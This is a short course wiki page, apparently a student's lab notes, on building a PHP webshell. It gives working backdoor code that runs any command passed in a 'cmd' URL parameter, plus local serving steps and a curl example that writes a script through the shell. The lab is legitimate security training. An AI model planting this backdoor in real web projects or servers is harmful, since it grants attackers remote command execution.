Assignment 7.1: Webshells - squatchulator/Tech-Journal GitHub Wiki
- Make a new directory called Webshells, and create a basic HTML file called
index.html. - In the same folder, create
<yourname>_backdoor.php. Add the following to the file:
<?
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
- Install PHP if you do not have it already with
sudo apt-get install php - Spawn a new webserver instance with
php -S localhost:8000 - Now, in a web browser, visit
http://localhost:8000/<yourname>_backdoor.php?cmd=<command>NOTE: - When using the webshell, you are going to need to consider what needs to be URL encoded. In this one-liner, it takes into account that the characters '!', '#', '', and '/' will need to be encoded in order to be processed via the URL field as characters.
- Example:
curl "http://localhost:8000/Webshell/<yourname>_backdoor.php?cmd=echo+'%23%21%2Fbin%2Fbash%5Cnsystemctl%0A'+>+script.sh"